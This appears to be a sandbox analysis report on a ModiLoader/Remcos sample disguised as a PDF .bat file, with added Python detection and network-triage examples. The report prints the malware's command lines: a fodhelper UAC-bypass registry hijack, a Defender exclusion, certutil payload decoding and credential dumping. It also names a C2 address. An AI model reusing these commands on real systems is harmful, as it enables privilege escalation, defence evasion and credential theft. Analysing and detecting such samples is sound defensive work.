C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Remcos

rat remcos

ModiLoader Second Stage

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Nirsoft

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Public\xkn.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows \System32\7343994.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\colorcpl.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" | C:\Users\Public\Libraries\Lewxa.com | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1396 set thread context of 224 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe
PID 1396 set thread context of 5008 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe
PID 1396 set thread context of 4544 | N/A | C:\Windows\SysWOW64\colorcpl.exe | C:\Windows\SysWOW64\colorcpl.exe

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\colorcpl.exe

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell | C:\Windows\system32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\reg.exe | N/A

Script User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\colorcpl.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4564 wrote to memory of 4044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 4044 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe
PID 4044 wrote to memory of 1272 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 4044 wrote to memory of 1272 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2948 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2948 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2948 wrote to memory of 4892 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2948 wrote to memory of 4892 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2428 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2428 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2428 wrote to memory of 1160 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 2428 wrote to memory of 1160 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\extrac32.exe
PID 4564 wrote to memory of 2140 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2140 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2140 wrote to memory of 3792 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 2140 wrote to memory of 3792 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\xkn.exe
PID 3792 wrote to memory of 628 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 3792 wrote to memory of 628 | N/A | C:\Users\Public\xkn.exe | C:\Users\Public\alpha.exe
PID 628 wrote to memory of 5004 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 628 wrote to memory of 5004 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\reg.exe
PID 3792 wrote to memory of 4988 | N/A | C:\Users\Public\xkn.exe | C:\Windows\system32\fodhelper.exe
PID 3792 wrote to memory of 4988 | N/A | C:\Users\Public\xkn.exe | C:\Windows\system32\fodhelper.exe
PID 4564 wrote to memory of 3544 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3544 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3544 wrote to memory of 2844 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 3544 wrote to memory of 2844 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4564 wrote to memory of 2032 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 2032 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 2032 wrote to memory of 4992 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 2032 wrote to memory of 4992 | N/A | C:\Users\Public\alpha.exe | C:\Users\Public\kn.exe
PID 4564 wrote to memory of 1000 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 1000 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 1000 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\Libraries\Lewxa.com
PID 4564 wrote to memory of 3960 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3960 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 4100 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 4100 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1712 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1712 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1852 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 1852 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 864 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 864 wrote to memory of 1376 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 864 wrote to memory of 1376 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 4564 wrote to memory of 3644 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 4564 wrote to memory of 3644 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Public\alpha.exe
PID 3644 wrote to memory of 552 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 3644 wrote to memory of 552 | N/A | C:\Users\Public\alpha.exe | C:\Windows\system32\taskkill.exe
PID 1000 wrote to memory of 2484 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 2484 | N/A | C:\Users\Public\Libraries\Lewxa.com | C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 2484 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 3356 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1000 wrote to memory of 1308 N/A C:\Users\Public\Libraries\Lewxa.com C:\Windows\SysWOW64\cmd.exe
PID 1308 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\7343994.exe
PID 1308 wrote to memory of 1456 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \System32\7343994.exe
PID 1456 wrote to memory of 736 N/A C:\Windows \System32\7343994.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 736 N/A C:\Windows \System32\7343994.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"

C:\Windows\system32\cmd.exe

cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\xkn.exe

C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "

C:\Users\Public\alpha.exe

"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "

C:\Windows\system32\fodhelper.exe

"C:\Windows\system32\fodhelper.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12

C:\Users\Public\Libraries\Lewxa.com

C:\\Users\\Public\\Libraries\\Lewxa.com

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettings.exe

C:\Windows\system32\SystemSettingsAdminFlows.exe

"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM SystemSettingsAdminFlows.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows "

C:\Windows\SysWOW64\cmd.exe

cmd /c mkdir "\\?\C:\Windows \System32"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Windows \System32\7343994.exe"

C:\Windows \System32\7343994.exe

"C:\Windows \System32\7343994.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""

C:\Windows\system32\cmd.exe

cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

C:\Windows\SysWOW64\extrac32.exe

C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\System32\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvmkexyxwegevgpvebjivyygouc"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\fprcfpiykmyjfvlznldkyllxpiuqfd"

C:\Windows\SysWOW64\colorcpl.exe

C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\prevghtsyurwibzdxwqdjpggypdrgoxekg"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1396 -ip 1396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 1524
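The command lines above form a single chain: extrac32 is abused as a file copier to relocate cmd.exe, powershell.exe and certutil.exe into C:\Users\Public as alpha.exe, xkn.exe and kn.exe; the renamed certutil decodes the payload out of the .bat with -decodehex; a per-user ms-settings ProgID handler is planted so that the auto-elevating fodhelper.exe runs the Defender exclusion with high integrity; the loader then creates "C:\Windows \System32" (trailing space) as a mock trusted directory for its sideloading stage; and the final Remcos payload drives NirSoft-style recovery tools through colorcpl.exe with /stext. The Python below is an added example written for this page, not part of the sandbox's own signature set. It runs argument-based rules over the command lines copied from the Processes section (embedded as constructed test input) and shows why matching on the executable name alone would miss every stage: each binary had been renamed before it was used. Rule names and the detail wording are the editor's own.

```python
"""Argument-based detection rules for the LOLBin chain in this report.

Added example written for this page; it is not part of the sandbox's signature
set. Rules key on command-line arguments, not image names, because the sample
renamed every system binary it used (cmd.exe -> alpha.exe, powershell.exe ->
xkn.exe, certutil.exe -> kn.exe). SAMPLE_CMDLINES is copied from the Processes
section of the report and serves as offline test input.
"""
import re
from collections import Counter
from typing import Dict, List

# Rule name -> compiled pattern. Backslashes are matched with \\+ because the
# report shows single and doubled backslashes within the same chain.
RULES = {
    # extrac32 /C /Y copies an arbitrary file; here it relocates system binaries.
    "extrac32_copy": re.compile(r'extrac32(?:\.exe)?\s+/C\s+/Y\s+"?([^"\s]+)"?\s+"?([^"\s]+)"?', re.I),
    # fodhelper.exe auto-elevates and honours this per-user ProgID handler.
    "ms_settings_hijack": re.compile(r"ms-settings\\+shell\\+open\\+command", re.I),
    "fodhelper_launch": re.compile(r"\bfodhelper\.exe", re.I),
    # certutil (renamed or not) used as a hex/base64 decoder for an embedded payload.
    "certutil_decode": re.compile(r"\s-decode(?:hex)?\b", re.I),
    # "C:\Windows \System32" (trailing space) mimics a trusted path for sideloading.
    "mock_trusted_dir": re.compile(r'\\windows\s+(?:\\|")', re.I),
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    # Remcos drives NirSoft-style recovery tools with /stext <outfile>.
    "nirsoft_stext": re.compile(r'\s/stext\s+"?[^"\s]+', re.I),
    # Killing the Settings UI hides the window fodhelper opens after the bypass.
    "settings_ui_kill": re.compile(r"taskkill\s+/F\s+/IM\s+SystemSettings(?:AdminFlows)?\.exe", re.I),
}

# Constructed test input: command lines copied verbatim from the report.
SAMPLE_CMDLINES = [
    r'cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe',
    r'C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe',
    r'C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe',
    r'reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "',
    r'"C:\Windows\system32\fodhelper.exe"',
    r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9',
    r'C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12',
    r'taskkill /F /IM SystemSettings.exe',
    r'taskkill /F /IM SystemSettingsAdminFlows.exe',
    r'cmd /c mkdir "\\?\C:\Windows "',
    r'cmd /c mkdir "\\?\C:\Windows \System32"',
    r'cmd /c "C:\Windows \System32\7343994.exe"',
    r'C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""',
    r'''powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"''',
    r'C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF',
    r'C:\Windows\SysWOW64\colorcpl.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvmkexyxwegevgpvebjivyygouc"',
    # Negative control: the initial launcher line trips none of the rules.
    r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"',
]


def scan(cmdlines: List[str]) -> List[dict]:
    """Return one finding per (rule, command line) pair that matches."""
    findings = []
    for cmd in cmdlines:
        for rule, pattern in RULES.items():
            m = pattern.search(cmd)
            if not m:
                continue
            finding = {"rule": rule, "cmdline": cmd}
            if rule == "extrac32_copy":
                src, dst = m.group(1), m.group(2)
                # A System32 source means a signed OS binary is being relocated.
                finding["detail"] = (
                    f"system binary {src} relocated to {dst}"
                    if re.search(r"system32", src, re.I)
                    else f"{src} copied to {dst}"
                )
            findings.append(finding)
    return findings


def summarize(findings: List[dict]) -> Dict[str, int]:
    """Count hits per rule."""
    return dict(Counter(f["rule"] for f in findings))


def uac_bypass_chain(findings: List[dict]) -> bool:
    """True when the ProgID hijack and the auto-elevating launcher both appear."""
    rules = {f["rule"] for f in findings}
    return {"ms_settings_hijack", "fodhelper_launch"} <= rules


if __name__ == "__main__":
    hits = scan(SAMPLE_CMDLINES)
    for rule, count in sorted(summarize(hits).items()):
        print(f"{rule:22s} {count}")
    print("fodhelper UAC bypass chain:", uac_bypass_chain(hits))
```

On this input every stage is flagged while the plain launcher line is not. The rules are deliberately narrow: a production version would additionally correlate the parent process (cmd.exe spawning a renamed copy of itself from C:\Users\Public) and the write to HKCU\Software\Classes\ms-settings, which the Signatures section above records as registry modification events.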

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 2.20.37.224:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 224.37.20.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 1010.filemail.com udp
US 23.237.50.106:443 1010.filemail.com tcp
US 23.237.50.106:443 1010.filemail.com tcp
US 8.8.8.8:53 106.50.237.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
N/A 127.0.0.1:45671 tcp
N/A 127.0.0.1:55677 tcp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 8.101.3.192.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 17.134.221.88.in-addr.arpa udp
GB 96.17.179.55:80 tcp
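The table above mixes sandbox noise (reverse lookups of every address it saw, Windows telemetry to Microsoft and Bing hosts) with the sample's own traffic, and some rows carry no Domain value because the sandbox could not tie the connection to a DNS answer. That missing column is itself the indicator: a RAT with a hard-coded C2 address connects to a raw IP without ever resolving a name, which is exactly how 192.3.101.8:55677 appears here. The Python below is an added example written for this page, not sandbox output. It parses the flattened table as printed (three or four whitespace-separated columns), buckets each flow, and lists the raw-IP endpoints and named external hosts an analyst would pivot on. NETWORK_TABLE is a subset copied from the rows above; BENIGN_DOMAINS is an analyst-supplied allowlist and is an assumption, not something the report states.

```python
"""Triage the flattened Network table from this sandbox report.

Added example for this page, not part of the sandbox output. Rows have three or
four columns because the Domain field is blank for connections the sandbox could
not associate with a DNS answer. The parser tolerates both shapes, separates
analysis-environment noise from the sample's traffic, and surfaces TCP
connections made to a raw IP with no resolved name, the pattern a hard-coded
C2 address produces.
"""
from dataclasses import dataclass
from typing import Dict, List

# Constructed test input: a subset of the report's Network table, copied verbatim.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 2.20.37.224:443 cxcs.microsoft.net tcp
US 8.8.8.8:53 1010.filemail.com udp
US 23.237.50.106:443 1010.filemail.com tcp
US 23.237.50.106:443 1010.filemail.com tcp
N/A 127.0.0.1:45671 tcp
N/A 127.0.0.1:55677 tcp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 8.101.3.192.in-addr.arpa udp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 192.3.101.8:55677 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 96.17.179.55:80 tcp
"""

# Analyst-supplied allowlist of OS telemetry hosts seen in the table (assumption).
BENIGN_DOMAINS = {"cxcs.microsoft.net", "g.bing.com", "tse1.mm.bing.net"}


@dataclass
class Flow:
    country: str
    dest: str      # ip:port as printed
    domain: str    # empty when the sandbox printed no Domain column
    proto: str


def parse_table(text: str) -> List[Flow]:
    """Parse the printed table; the first line is the column header."""
    flows = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 3:
            continue
        country, dest, proto = parts[0], parts[1], parts[-1]
        domain = parts[2] if len(parts) == 4 else ""
        flows.append(Flow(country, dest, domain, proto))
    return flows


def classify(flow: Flow) -> str:
    """Bucket a flow: sandbox noise, loopback, telemetry, named external, raw IP."""
    ip, _, port = flow.dest.rpartition(":")
    if flow.proto == "udp" and port == "53":
        # The sandbox reverse-resolves every address it sees; that is not sample behaviour.
        return "dns_reverse" if flow.domain.endswith(".in-addr.arpa") else "dns_forward"
    if ip.startswith("127."):
        return "loopback"
    if flow.domain in BENIGN_DOMAINS:
        return "telemetry"
    if flow.domain:
        return "external_named"
    # TCP to an address for which no name was resolved: hard-coded endpoint.
    return "direct_ip"


def triage(text: str) -> Dict[str, List[Flow]]:
    buckets: Dict[str, List[Flow]] = {}
    for flow in parse_table(text):
        buckets.setdefault(classify(flow), []).append(flow)
    return buckets


def direct_ip_endpoints(text: str) -> List[str]:
    """Unique ip:port targets contacted without any resolved name."""
    return sorted({f.dest for f in triage(text).get("direct_ip", [])})


def named_externals(text: str) -> List[str]:
    """Unique non-allowlisted domains the sample connected to."""
    return sorted({f.domain for f in triage(text).get("external_named", [])})


if __name__ == "__main__":
    for bucket, flows in sorted(triage(NETWORK_TABLE).items()):
        print(f"{bucket:15s} {len(flows)}")
    print("raw-IP endpoints:", direct_ip_endpoints(NETWORK_TABLE))
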